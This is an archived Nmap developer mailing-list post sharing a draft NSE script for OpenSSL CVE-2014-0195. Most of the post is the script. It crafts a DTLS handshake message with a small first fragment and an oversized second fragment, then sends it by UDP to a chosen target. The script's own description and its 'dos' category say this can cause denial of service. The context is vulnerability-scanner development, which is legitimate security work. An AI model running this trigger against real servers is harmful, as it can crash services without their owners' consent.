Nmap Development mailing list archives
NSE: OpenSSL CVE-2014-0195
From: Loganaden Velvindron <logan () elandsys com>
Date: Fri, 13 Jun 2014 14:47:11 -0700
Hi All, It's still a work in progress for OpenSSL CVE-2014-0195. I'll update it soon, as i'm done tweaking it. Meanwhile, feedback welcomed. description=[[ Sends a UDP packet containing 2 fragments. CVE-2014-0195 shows that OpenSSL does not validate the size of subsequent DTLS fragments after the first one has been sent. This may cause DoS. ]] --- --@usage nmap -sU -p <portnum> --script cve_2014_0195 --script-args cve_2014_0195.ports=<ports> <target> author = "Loganaden Velvindron (logan () elandsys com)" license = "Same as Nmap--See http://nmap.org/book/man-legal.html" categories = {"dos", "vuln"} local string = require "string" local shortport = require "shortport" local bin = require "bin" local comm = require "comm" local stdnse = require "stdnse" portrule = function(host, port) if not stdnse.get_script_args(SCRIPT_NAME .. ".ports") then stdnse.print_debug(3,"Skipping '%s' %s, 'ports' argument is missing.",SCRIPT_NAME, SCRIPT_TYPE) return false end local ports = stdnse.get_script_args(SCRIPT_NAME .. ".ports") --print out a debug message if port 443/udp is open if port.number==443 and port.protocol == "udp" and not(ports) then stdnse.print_debug("Port 443/udp is open. TLS over UDP") return false end return port.protocol == "udp" and stdnse.in_port_range(port, ports:gsub(",",",") ) and not(shortport.port_is_excluded(port.number,port.protocol)) end -- first fragment local frag1 = string.char(0x01) ..string.char(0x00) ..bin.pack(">H", 16) ..string.char(0x00, 0x00) ..string.char(0x00, 0x00, 0x00) ..string.char(0x00) ..bin.pack(">H",15) ..string.rep("A",15) -- second fragment local frag2 = string.char(0x01) ..string.char(0x00) ..bin.pack(">H", 4098) ..string.char(0x00, 0x00) ..string.char(0x00, 0x00, 0x00) ..string.char(0x00) ..bin.pack(">H",4097) ..string.rep("B",4097) local msg = string.char(0x01) ..bin.pack(">H", 0xfeff) ..bin.pack(">H", 0x00) ..string.char(0x00,0x00,0x00,0x00,0x00,0x00) ..bin.pack(">H",string.len(frag1..frag2)) local payload = msg .. frag1 .. frag2 action = function(host, port) local status, result = comm.exchange(host, port, payload, {proto="udp"}) if not status then return false else return true end end _______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
Current thread:
- NSE: OpenSSL CVE-2014-0195 Loganaden Velvindron (Jun 13)
- Re: NSE: OpenSSL CVE-2014-0195 Patrick Donnelly (Jun 15)
- Re: NSE: OpenSSL CVE-2014-0195 Loganaden Velvindron (Jun 15)
- Re: NSE: OpenSSL CVE-2014-0195 Patrick Donnelly (Jun 15)